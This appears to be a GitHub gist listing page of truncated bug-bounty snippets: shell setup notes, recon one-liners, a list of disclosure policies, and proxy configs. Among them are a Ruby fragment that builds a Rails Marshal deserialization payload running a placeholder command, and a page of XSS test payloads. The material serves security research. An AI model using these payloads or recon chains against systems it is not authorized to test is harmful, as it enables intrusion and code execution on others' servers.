As configured in my dotfiles.
start new:
tmux
start new with session name:
| #!/bin/bash | |
| # update apt-get | |
| export DEBIAN_FRONTEND="noninteractive" | |
| sudo apt-get update | |
| # remove previously installed Docker | |
| sudo apt-get purge lxc-docker* | |
| sudo apt-get purge docker.io* |
| wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip;unzip top-1m.csv.zip; awk -F ',' '{print $2}' top-1m.csv|head -1000 > top-1000.txt; rm top-1m.csv* |
As configured in my dotfiles.
start new:
tmux
start new with session name:
| #THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others | |
| require 'base64' | |
| require 'openssl' | |
| require 'optparse' | |
| require 'open-uri' | |
| SECRET_TOKEN = "SECRET HERE" | |
| code = "eval('`COMMAND HERE`')" | |
| marshal_payload = Base64.encode64( | |
| "\x04\x08" + | |
| "o" + |
| <html> | |
| <head></head> | |
| <body> | |
| <a href="javascript: alert('clicked xss link')" id="link">click me</a> | |
| <img src="xx" onerror="alert('xss')" /> | |
| </body> | |
| </html> |
| google dork -> site:.co.uk inurl:"responsible disclosure" | |
| https://registry.internetnz.nz/about/vulnerability-disclosure-policy/ | |
| http://www.123contactform.com/security-acknowledgements.htm | |
| https://18f.gsa.gov/vulnerability-disclosure-policy/ | |
| https://support.1password.com/security-assessments/ | |
| https://www.23andme.com/security-report/ | |
| https://www.abnamro.com/en/footer/responsible-disclosure.html | |
| https://www.accenture.com/us-en/company-accenture-responsible-disclosure | |
| https://www.accredible.com/white_hat/ | |
| https://www.acquia.com/how-report-security-issue |
| curl -s "http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey" | grep -P "=" | sed "/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d" > Output.txt ; for i in $(cat Output.txt);do URL="${i}"; LIST=(${URL//[=&]/=FUZZ&}); echo ${LIST} | awk -F'=' -vOFS='=' '{$NF="FUZZ"}1;' >> Passive_Collecting_URLParamter.txt ; done ; rm Output.txt ; sort -u Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt |
| { | |
| "30523382": { | |
| "className": "Proxy", | |
| "data": { | |
| "bypassFPForPAC": true, | |
| "color": "#f57575", | |
| "configUrl": "", | |
| "credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=", | |
| "cycle": false, | |
| "enabled": true, |
| { | |
| "84kr3q1592995213323": { | |
| "type": 1, | |
| "color": "#cc883a", | |
| "title": "Burp", | |
| "active": true, | |
| "address": "127.0.0.1", | |
| "port": 8080, | |
| "proxyDNS": false, | |
| "username": "", |
| wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml | |
| echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt | |
| cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt | |
| cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt |